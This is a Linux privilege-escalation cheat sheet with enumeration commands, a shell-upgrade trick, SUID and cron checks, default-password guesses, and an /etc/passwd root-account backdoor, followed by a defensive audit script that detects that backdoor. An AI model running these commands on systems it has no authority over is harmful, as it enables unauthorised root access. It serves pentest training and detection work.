Privilege Escalation

Based on g0tmilk’s Guide to Linux Privilege Escalation + additional field notes.


Step 1: Upgrade Your Shell

Make your shell more stable & interactive:

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'

# Background the shell with Ctrl+Z, then fix the terminal from your local side
Ctrl + Z
stty raw -echo; fg; reset
stty columns 200 rows 200

Step 2: Enumeration – System Context

Capabilities & Tooling

which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat

Arch, Kernel & Distro

file /bin/bash        # architecture (32- vs 64-bit)
uname -a              # kernel version
cat /etc/*-release    # distribution / version
cat /etc/issue

Step 3: User Context

Are we a real user?

sudo -l
ls -lsaht /etc/sudoers
groups <user>
env

Users & homes:

cd /home/ && ls -lsaht

Step 4: Credentials & Configs

Check for web creds:

cd /var/www/html/ && ls -lsaht

Check /etc/ for unusual configs:

ls -lsaht /etc/
ls -lsaht /etc/ | grep -i '\.conf'
ls -lsaht /etc/ | grep -i '\.secret'

SSH keys:

ls -lsaR /home/

Other dirs of interest:

ls -lsaht /var/lib/
ls -lsaht /var/db/
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/

Step 5: Escalation Primitives

SUID / SGID

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Check exploitation paths: GTFOBins

File Capabilities

getcap -r / 2>/dev/null

Reference: Linux File Capabilities


Step 6: Process & Cron Monitoring

Running Processes

ps aux | grep -i root --color=auto

Network

netstat -antup
netstat -tunlp

Cron Jobs

crontab -u root -l
cat /etc/crontab
ls /etc/cron.*

Process Monitoring (pspy)

# On the target host, after transferring the pspy binary (e.g. into /var/tmp/):
cd /var/tmp/
# Transfer pspy here
chmod 755 pspy64
./pspy64

Reference: pspy


Step 7: Databases

Check for MySQL root creds:

mysql -uroot -p
# Try common passwords:
# root, toor, (empty)

Step 8: File Transfers

Check what’s available:

which wget
which curl
which nc
which fetch
ls -lsaht /bin/ | grep -i 'ftp'

Step 9: NFS

Check for exports:

cat /etc/exports

👉 Look for no_root_squash in the export options.

Reference: Attacking NFS Shares


Step 10: Persistence / Living on Host

Writable locations:

  • /var/tmp/
  • /tmp/
  • /dev/shm/

Check mounts:

cat /etc/fstab

Step 11: Local Port Forwards

If vulnerable services are only on 127.0.0.1:


Step 12: Direct Root via /etc/passwd

If writable:

# Quote the password: an unquoted '<' is a shell redirect
openssl passwd -1 'i<3hacking'
# Example output: $1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.
echo 'siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
su siren
id
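A defensive check for the two artefacts this technique leaves behind (an extra UID 0 account, and a password hash stored inline in /etc/passwd instead of the "x" that defers to /etc/shadow). This is an added example, not part of the original notes; the sample passwd content is constructed and the function name audit_passwd is chosen for this example.

```shell
#!/bin/sh
# Audit an /etc/passwd-style file for the indicators of an appended root-equivalent
# account. Usage: audit_passwd [file]  (defaults to stdin; prints one finding per
# line and returns 1 if anything was flagged, 0 otherwise).
audit_passwd() {
    awk -F: '
        /^[ \t]*$/ { next }                                   # skip blank lines
        NF != 7 { print "malformed entry: " $0; found = 1; next }
        $3 == 0 && $1 != "root" { print "extra UID 0 account: " $1; found = 1 }
        $2 == "" { print "empty password field: " $1; found = 1 }
        # "x" defers to /etc/shadow; "*" / "!..." are locked; anything else is a hash
        $2 != "" && $2 != "x" && $2 !~ /^[*!]/ { print "inline password hash: " $1; found = 1 }
        END { exit found ? 1 : 0 }
    ' "${1:--}"
}

# Constructed sample, not a real system file: a normal root entry, a normal user,
# and the appended "siren" line from the example above.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:alice:/home/alice:/bin/bash
siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash'

# Number of findings in the sample (the pipeline's own status is always 0).
count_findings() {
    printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd | wc -l | tr -d ' '
}

# On a live host run: audit_passwd /etc/passwd
printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd || echo "audit_passwd returned non-zero: findings above"
```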

Step 13: Miscellaneous

  • Mail:

    cd /var/mail/
    cd /var/spool/mail/
    ls -lsaht

  • Files by specific user (ex: bob):

    find / -user bob 2>/dev/null
